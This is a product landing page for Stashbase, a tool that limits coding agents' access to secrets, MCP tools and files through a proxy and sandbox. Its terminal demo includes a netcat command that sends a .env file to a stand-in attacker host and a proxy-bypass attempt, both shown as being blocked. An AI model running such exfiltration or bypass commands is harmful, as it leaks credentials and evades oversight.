Scoped access for
Ship securely with coding agents—from development to production. Stashbase scopes agent access to credentials, APIs, tools, files, and dependencies without exposing raw secrets.
No credit card required
$
Give agents access—not your credentials
Let coding agents use the APIs, tools, and credentials they need while Stashbase keeps raw secrets outside the agent context and enforces policy at the request boundary.
egress_hosts = ["api.github.com", "mcp.linear.app"]
[secrets]
project = "project"
environment = "api-staging"
[secrets.GITHUB_TOKEN]
env = "GITHUB_TOKEN"
[[secrets.GITHUB_TOKEN.rules]]
effect = "allow"
hosts = ["api.github.com"]
methods = ["GET"]
paths = ["/repos/*/*/issues*"]
[personal_credentials.LINEAR_API_KEY]
env = "LINEAR_API_KEY"
[[personal_credentials.LINEAR_API_KEY.rules]]
effect = "allow"
hosts = ["mcp.linear.app"]
methods = ["GET", "POST"]
paths = ["/mcp"]Desktop quickstart
Try it yourself
Open this page on macOS or Linux to install the CLI and try the local policy.
Control MCP tools
Filter MCP tools and reject unauthorized calls while credentials remain behind the boundary.
Keep sensitive files outside the agent context
Scope filesystem access so agents can work in a project without opening up local secrets and certificates.
Prevent agents from installing known-vulnerable packages.
Scan packages for known CVEs before install and block dependencies that fail policy.
[personal_credentials.LINEAR_API_KEY]
env = "LINEAR_API_KEY"
[[personal_credentials.LINEAR_API_KEY.rules]]
effect = "allow"
hosts = ["mcp.linear.app"]
methods = ["GET", "POST"]
paths = ["/mcp"]
[mcp_servers.linear]
url = "https://mcp.linear.app/mcp"
binding = "LINEAR_API_KEY"
allow_tools = ["*"]
deny_tools = ["delete_issue"]Control tools as well as credentials.
Credentials stay at the boundary
Bindings inject authentication without exposing its value.
Allowed tools are visible
Unauthorized tools are filtered from the server’s tool list.
Denied tools cannot run
Calls outside policy are rejected before they reach the server.
Choose the right boundary
Keep the same profile while placing the proxy exactly where your team needs its trust boundary.
Run the proxy on your machine for a simple, private local development setup.
Run remotely for stronger security and isolation between agents and secrets.
Enforced, not just configured
With the Docker backend, the agent runs inside a sandbox whose only route to the network is the Stashbase proxy. It can’t bypass your policies, read files you’ve denied, or send data to hosts you haven’t allowed.
egress_hosts = ["api.anthropic.com", "api.stripe.com"]
[sandbox]
backend = "docker"
isolated_paths = ["node_modules"]
[filesystem]
deny_read = ["./.env"]
[secrets.STRIPE_SECRET_KEY]
...$ cat .env
# empty: denied by profile
$ env -u HTTPS_PROXY curl https://example.com
curl: (7) Failed to connect
# can't skip the proxy: blocked by the firewall
$ nc attacker.example 4444 < .env
# blocked: only HTTP(S) through the proxy is allowed
$ curl -u "$STRIPE_SECRET_KEY:" \
https://api.stripe.com/v1/charges
# 200 OK: allowed, real key injected by the proxyA firewall, not just env vars
With the Docker backend, anything that tries to skip the Stashbase proxy is blocked. Unsetting HTTPS_PROXY or opening a raw connection doesn’t get around it.
$ env -u HTTPS_PROXY curl … → blockedRules the agent can’t touch
The firewall is set up outside the agent’s reach. The agent has no permission to change or remove it, so a compromised agent can’t switch it off.
disable firewall → permission deniedTwo backends, same profile
An OS-level sandbox by default, with nothing extra to install. Or switch to Docker for container isolation, where the agent sees only your project.
backend = "native" | "docker"Bring your own image
Use the default image with Claude Code and Codex preinstalled, or point a profile at your own image or Dockerfile. Custom images add tools, never privileges.
dockerfile = "./sandbox.Dockerfile"Application secrets, managed in the same access layer
Organize application secrets across projects and environments, then control and audit how people, services, and coding agents use them.
Organize by project and environment
Keep each application’s configuration and secrets in the right place.
Deliver only what each workflow needs
Give developers, services, and agents scoped access without copying values.
Audit every credentialed operation
Review access decisions and usage as work moves toward production.
project:
name: web-api
environment:
name: production
is_production: true
secrets:
- name: AWS_ACCESS_KEY_ID
- name: DATABASE_URL
comment: Used by the application database clientSafe context for agents
Give agents the schema, not the values.
Generate a value-free YAML schema so coding agents know what an environment expects without receiving the credentials behind it.
Bring secure environment work into your tools
Inspect context and draft changes—never expose secret values.
Keep secure workflows in your terminal
Manage environments, run apps, and scan changes without leaving your terminal.
Explore everyday workflows in your terminal
Turn environment questions into action
Ask, analyze, and draft changes—then review before anything goes live.
Protect credentials from development to production
Encrypt and isolate every secret from local development to production.
Catch hardcoded secrets before they ship
Agents and developers both hardcode credentials. Catch them early and replace them with managed values.
Detect exposure
See exposed credentials wherever they surface.
Detect API keys, tokens, and other credentials in human- or agent-written code.
Continuously monitor GitHub for secrets that slip through.
Prevent the leak
Stop risky changes before they spread.
Scan staged changes, including agent edits, before they are committed or pushed.
Tune rules to the services and standards your team uses.
Respond with confidence
Get the right people moving on the right fix.
Notify your team as soon as an exposed secret is found.
Move to managed values and rotate compromised credentials.
Turn a secret leak into a reviewed fix.
Private AI drafts a commit-ready patch, removes the exposed value, and rotates the matching secret in Stashbase—so your team stays in control of every change.
Works with your existing infrastructure
Sync application secrets to the tools you use to build, deploy, and run applications.


Keep every operation accountable
Trace changes, control service access, and see how credentials are used.
Let agents do useful work—with scoped access.
Give people and agents the access they need, when they need it—without spreading secrets across the tools your team depends on.